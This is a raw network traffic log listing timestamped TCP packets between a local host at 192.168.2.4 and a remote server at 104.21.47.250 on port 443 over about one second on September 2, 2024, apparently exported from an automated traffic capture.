    Sep 2, 2024 00:28:24.809384108 CEST49767443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:24.813823938 CEST49764443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:24.813966990 CEST44349764104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:24.814997911 CEST49761443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:24.815166950 CEST44349761104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:24.815462112 CEST49766443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:24.815593958 CEST44349766104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:24.815903902 CEST49763443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:24.816108942 CEST44349763104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:24.816323042 CEST49760443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:24.816346884 CEST44349760104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:24.817737103 CEST49767443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:24.817816973 CEST44349767104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:24.818557024 CEST49764443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:24.818612099 CEST49761443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:24.819653034 CEST49766443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:24.819829941 CEST49763443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:24.820097923 CEST49767443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:24.820125103 CEST44349767104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:24.821641922 CEST44349762104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:24.822118044 CEST49762443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:24.822206020 CEST44349762104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:24.822268009 CEST49762443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:24.860510111 CEST44349763104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:24.860510111 CEST44349761104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:24.860524893 CEST44349766104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:24.860526085 CEST44349764104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:24.862235069 CEST49767443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:24.864495039 CEST44349762104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:24.914182901 CEST49770443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:24.914236069 CEST44349770104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:24.914294004 CEST49770443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:24.914793015 CEST49770443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:24.914808035 CEST44349770104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:24.921506882 CEST44349764104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:24.922103882 CEST44349764104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:24.922153950 CEST49764443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:24.922178030 CEST44349764104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:24.922194004 CEST44349764104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:24.922239065 CEST49764443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:24.922835112 CEST44349766104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:24.922871113 CEST44349766104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:24.922918081 CEST49766443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:24.922928095 CEST44349766104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:24.922955990 CEST44349766104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:24.923007965 CEST49766443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:24.925054073 CEST44349767104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:24.925096989 CEST44349767104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:24.925127029 CEST44349767104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:24.925142050 CEST49767443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:24.925149918 CEST44349767104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:24.925177097 CEST44349767104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:24.925189972 CEST49767443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:24.925194025 CEST44349767104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:24.925236940 CEST49767443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:24.925240993 CEST44349767104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:24.925268888 CEST44349767104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:24.925307989 CEST49767443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:24.930717945 CEST44349761104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:24.930775881 CEST44349761104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:24.930816889 CEST49761443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:24.930826902 CEST44349761104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:24.930872917 CEST44349761104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:24.930912971 CEST49761443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:24.932025909 CEST44349763104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:24.932099104 CEST44349763104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:24.932131052 CEST44349763104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:24.932149887 CEST49763443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:24.932163000 CEST44349763104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:24.932204008 CEST49763443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:24.932204962 CEST44349763104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:24.932216883 CEST44349763104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:24.932265997 CEST49763443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:24.932760954 CEST44349763104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:24.932981014 CEST44349763104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:24.933007002 CEST44349763104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:24.933029890 CEST49763443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:24.933039904 CEST44349763104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:24.933078051 CEST49763443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:24.936741114 CEST44349763104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:24.936825991 CEST44349763104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:24.936875105 CEST49763443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:24.936886072 CEST44349763104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:24.978678942 CEST49761443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:24.978754044 CEST44349761104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:24.984009027 CEST49763443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:24.990926981 CEST49766443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:24.990961075 CEST44349766104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:24.999754906 CEST49764443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:24.999777079 CEST44349764104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.005465984 CEST49767443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.005475044 CEST44349767104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.016402006 CEST44349763104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.016501904 CEST44349763104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.016541004 CEST44349763104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.016544104 CEST49763443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.016572952 CEST44349763104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.016613007 CEST49763443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.016661882 CEST44349763104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.016758919 CEST44349763104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.016791105 CEST49763443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.016797066 CEST44349763104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.016808987 CEST44349763104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.016846895 CEST49763443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.016855001 CEST44349763104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.017452002 CEST44349763104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.017494917 CEST49763443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.017504930 CEST44349763104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.017549038 CEST44349763104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.017584085 CEST49763443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.017590046 CEST44349763104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.017600060 CEST44349763104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.017637968 CEST49763443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.017644882 CEST44349763104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.017729998 CEST44349763104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.017777920 CEST49763443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.018028975 CEST49763443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.018044949 CEST44349763104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.037798882 CEST49771443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.037841082 CEST44349771104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.037903070 CEST49771443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.038414955 CEST49771443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.038428068 CEST44349771104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.039201021 CEST49772443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.039243937 CEST44349772104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.039295912 CEST49772443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.039474964 CEST49772443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.039489031 CEST44349772104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.094425917 CEST44349762104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.094475031 CEST44349762104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.094520092 CEST49762443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.094547033 CEST44349762104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.094568968 CEST44349762104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.094604969 CEST49762443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.095448971 CEST49762443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.095467091 CEST44349762104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.104722977 CEST49773443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.104770899 CEST44349773104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.104845047 CEST49773443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.105062962 CEST49773443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.105077028 CEST44349773104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.107280970 CEST49774443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.107291937 CEST44349774104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.107359886 CEST49774443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.107845068 CEST49774443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.107852936 CEST44349774104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.349921942 CEST44349770104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.350270987 CEST49770443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.350301981 CEST44349770104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.350639105 CEST44349770104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.351046085 CEST49770443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.351100922 CEST44349770104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.351296902 CEST49770443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.396502972 CEST44349770104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.474643946 CEST44349771104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.474982023 CEST49771443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.475009918 CEST44349771104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.475235939 CEST44349772104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.475358963 CEST44349771104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.475554943 CEST49772443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.475583076 CEST44349772104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.475920916 CEST49771443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.475985050 CEST44349771104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.476161003 CEST49771443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.476583004 CEST44349772104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.476644993 CEST49772443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.477032900 CEST49772443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.477092028 CEST44349772104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.477178097 CEST49772443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.477190018 CEST44349772104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.487840891 CEST44349770104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.487888098 CEST44349770104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.487926006 CEST44349770104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.487936974 CEST49770443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.487945080 CEST44349770104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.487977982 CEST44349770104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.487987041 CEST49770443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.487993002 CEST44349770104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.488040924 CEST49770443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.488045931 CEST44349770104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.488343000 CEST44349770104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.488389969 CEST49770443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.488394976 CEST44349770104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.488435030 CEST44349770104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.488477945 CEST49770443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.488490105 CEST44349770104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.494474888 CEST44349770104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.494525909 CEST49770443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.494532108 CEST44349770104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.520497084 CEST44349771104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.530519962 CEST49772443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.543363094 CEST44349773104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.544750929 CEST49773443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.544775963 CEST44349773104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.545140028 CEST44349773104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.545952082 CEST49773443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.546020031 CEST49770443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.546062946 CEST44349773104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.546253920 CEST49773443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.566673040 CEST44349774104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.566890955 CEST49774443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.566901922 CEST44349774104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.567946911 CEST44349774104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.568013906 CEST49774443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.568320036 CEST49774443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.568382025 CEST44349774104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.568466902 CEST49774443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.568474054 CEST44349774104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.570413113 CEST44349770104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.570504904 CEST44349770104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.570530891 CEST44349770104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.570550919 CEST49770443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.570576906 CEST44349770104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.570601940 CEST44349770104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.570611954 CEST49770443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.570619106 CEST44349770104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.570662975 CEST49770443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.571387053 CEST44349770104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.571433067 CEST44349770104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.571468115 CEST44349770104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.571479082 CEST49770443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.571490049 CEST44349770104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.571527004 CEST49770443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.572257996 CEST44349770104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.572323084 CEST44349770104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.572375059 CEST49770443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.572387934 CEST44349770104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.572782040 CEST44349770104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.572808027 CEST44349770104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.572827101 CEST49770443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.572834969 CEST44349770104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.572863102 CEST44349770104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.572875977 CEST49770443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.572880983 CEST44349770104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.572916031 CEST49770443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.573563099 CEST44349770104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.573740959 CEST44349770104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.573791027 CEST49770443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.573793888 CEST44349770104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.573801041 CEST44349770104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.573839903 CEST49770443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.574481010 CEST44349770104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.588505983 CEST44349773104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.596087933 CEST44349772104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.596141100 CEST44349772104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.596184015 CEST44349772104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.596198082 CEST49772443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.596230984 CEST44349772104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.596272945 CEST44349772104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.596307039 CEST49772443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.596314907 CEST44349772104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.596368074 CEST49772443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.596375942 CEST44349772104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.596389055 CEST44349772104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.596440077 CEST49772443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.597426891 CEST49772443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.597441912 CEST44349772104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.602438927 CEST44349771104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.602524042 CEST44349771104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.602565050 CEST49771443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.602587938 CEST44349771104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.602605104 CEST44349771104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.602648973 CEST49771443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.603183031 CEST49771443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.603199005 CEST44349771104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.630079031 CEST49770443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.630085945 CEST49774443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.630095005 CEST44349770104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.672169924 CEST49770443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.951272964 CEST44349770104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.951349020 CEST44349770104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.951383114 CEST44349770104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.951410055 CEST49770443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.951415062 CEST44349770104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.951440096 CEST44349770104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.951455116 CEST44349770104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.951483965 CEST49770443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.951487064 CEST44349770104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.951495886 CEST44349770104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.951502085 CEST49770443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.951524019 CEST44349770104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.951530933 CEST49770443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.951550007 CEST44349770104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.951600075 CEST49770443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.951606989 CEST44349770104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.951739073 CEST44349770104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.951766968 CEST44349770104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.951776028 CEST49770443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.951782942 CEST44349770104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.951817989 CEST49770443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.951986074 CEST44349770104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.952023983 CEST44349770104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.952029943 CEST49770443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.952035904 CEST44349770104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.952054024 CEST44349770104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.952059031 CEST49770443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.952085972 CEST44349770104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.952095985 CEST49770443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.952100039 CEST44349770104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.952135086 CEST49770443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.952363968 CEST44349770104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.952389956 CEST44349770104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.952410936 CEST49770443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.952419043 CEST44349770104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.952435017 CEST49770443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.952797890 CEST44349773104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.952853918 CEST44349773104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.952894926 CEST44349773104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.952923059 CEST49773443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.952934027 CEST44349770104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.952939987 CEST44349773104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.952955008 CEST44349773104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.952989101 CEST49770443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.952990055 CEST49773443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.952999115 CEST44349770104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.953023911 CEST44349773104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.953037024 CEST49770443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.953063965 CEST44349773104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.953073978 CEST49773443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.953089952 CEST44349773104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.953138113 CEST44349773104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.953145027 CEST49773443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.953155994 CEST44349773104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.953197002 CEST49773443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.953205109 CEST44349773104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.954092026 CEST44349774104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.954170942 CEST44349774104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.954222918 CEST49774443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.956285000 CEST44349770104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.956345081 CEST49770443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.957564116 CEST44349770104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.957621098 CEST49770443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.958326101 CEST44349770104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.958391905 CEST49770443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.958527088 CEST44349770104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.958585978 CEST49770443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.958755016 CEST44349770104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.958800077 CEST44349770104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.958805084 CEST49770443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.958817005 CEST44349770104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.958838940 CEST49770443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.958853960 CEST49770443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.959574938 CEST44349770104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.959626913 CEST49770443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.959716082 CEST44349770104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.959758997 CEST49770443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.960103989 CEST44349773104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.960144997 CEST44349773104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.960146904 CEST49773443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.960175991 CEST44349773104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.960242033 CEST49773443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.960251093 CEST44349773104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.960570097 CEST44349773104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.960603952 CEST44349770104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.960607052 CEST44349773104.21.47.250192.168.2.4
    Sep 2, 2024 00:28:25.960633993 CEST49773443192.168.2.4104.21.47.250
    Sep 2, 2024 00:28:25.960648060 CEST44349773104.21.47.250192.168.2.4
